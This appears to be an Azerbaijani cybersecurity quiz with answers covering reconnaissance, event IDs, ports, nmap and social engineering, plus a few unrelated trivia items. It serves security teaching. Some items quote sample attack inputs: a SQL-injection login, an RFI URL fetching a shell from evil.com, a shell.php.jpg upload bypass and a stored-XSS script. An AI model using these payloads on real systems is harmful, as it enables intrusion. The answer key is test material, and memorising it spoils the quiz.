Pentester olaraq şirkət haqqında LinkedIn, rəsmi sayt və sosial şəbəkələrdən məlumat toplayırsan. Bu hansi Recon növüdür?
Passive Reconnaissance
Log Name: Security
Event ID: 4625
Account Name: Administrator
Source IP: 192.168.1.50
Bu log ilk olaraq hansı hadisəni göstərir?
Uğursuz giriş cəhdi
RDP protokolunun portu neçədir?
3389
GET /login.php HTTP/1.1
Host: target.local
Username: admin' --
Password: 123456
Bu giriş cəhdi ilk olaraq hansı zəifliyi yoxlamağa çalışır?
SQL INJECTION
PORT STATE SERVICE 53/udp open domain
Bu port əsasən hansı xidmətə aiddir?
DNS
Bu skript nə vaxt avtomatik icra olunacaq?
student@kali:~$ crontab -l
0 2 * * * /home/student/backup.sh
Hər gün saat 2də
Event ID: 4624 Logon Type: 10 Account: Administrator Source IP: 10.10.10.5
Bu istifadəçi sistemə hansı üsulla daxil olub?
RDP
Şirkətin əməkdaşı "Maaş Siyahısı 2026.xlsx" adlı e-mail alır. Faylı açdıqdan bir neçə saniyə sonra kompüterində qəribə proseslər başlayır.
Bu hücumun istifadə etdiyi əsas sosial mühəndislik üsulu nədir?
Phishing
https://target.local/index.php?page=home.php
Bu URL-i görən pentester ilk hansı zəifliyi yoxlamağı düşünər?
LFI
TCP Connection
Client -------- SYN -------->
Server <------ SYN, ACK -----
Client -------- ACK -------->
Bu proses necə adlanır?
TCP Three-Way Handshake
Haker hədəf işçiyə içində zərərli kod olan bir e-mail göndərirsə, bu Cyber Kill Chain modelinin hansı mərhələsidir?
Delivery
DDOS,SQL INJECTION,XSS kimi hücumların qarşısını almaq üçün hansı təhlükəsizlik aləti quraşdırılır?
WAF
Hücumçu şirkətin resepsiyasına zəng edir və özünü İT şöbəsinin əməkdaşı kimi təqdim edir.
"Sistemlər yenilənir, zəhmət olmasa istifadəçi adınızı və birdəfəlik giriş kodunuzu deyin."
Əməkdaş məlumatları paylaşır.
Bu hücum növü necə adlanır?
Vishing
POST /upload.php HTTP/1.1
Filename: shell.php.jpg
Content-Type: image/jpeg
Hücumçu bu faylı niyə shell.php.jpg adı ilə yükləməyə çalışır?
Serverin fayl uzantısı yoxlamasını bypass etməyə çalışır.
nmap -sV əmri nə üçün istifadə olunur?
Xidmətlərin versiyalarını müəyyən etmək üçün
student@kali:~$ sudo -l Pentester bu əmri niyə ilk işlədən əmrlərdən biri hesab edir?
İstifadəçinin sudo ilə hansı əmrləri işlədə biləcəyini öyrənmək üçün
Task Schedular-da yaratdığımız task ilə edilən girişin logon type-ı neçədir?
4
Dünyanın ən kiçik ölkəsi hansıdır?
Vatikan
https://target.az/index.php?page=http://evil.com/shell.txt
Server uzaqdakı faylı icra edir.
Bu hansı zəiflikdir?
RFI
nmap -O 192.168.1.10 əmri nə üçün istifadə olunur?
Əməliyyat sisteminin müəyyən edilməsi üçün
Pentest zamanı cat /etc/passwd faylını oxuya bildiniz, lakin /etc/shadow faylını oxuya bilmədiniz. Bunun səbəbi nə ola bilər?
/etc/shadow yalnız root istifadəçisi tərəfindən oxuna bilər
C:\\Windows\System32\winevt
💍 + 🍀 bu simvollar hansı Azərbaycan filmini göstərir?
Bəxt üzüyü
İki istifadəçi eyni forumdan istifadə edir.
İstifadəçi A aşağıdakı şərhi yazır:
<script>alert("Hello")</script>Bir neçə saat sonra istifadəçi B mövzunu açan kimi eyni popup görünür.
Bu hansı XSS növüdür?
Stored XSS
Pentester eyni hədəfi iki fərqli üsulla skan edir.
Birinci scan 30 saniyəyə, ikinci scan isə 6 dəqiqəyə tamamlanır.
Uzun çəkən scan böyük ehtimalla hansı scan növüdür?
UDP scan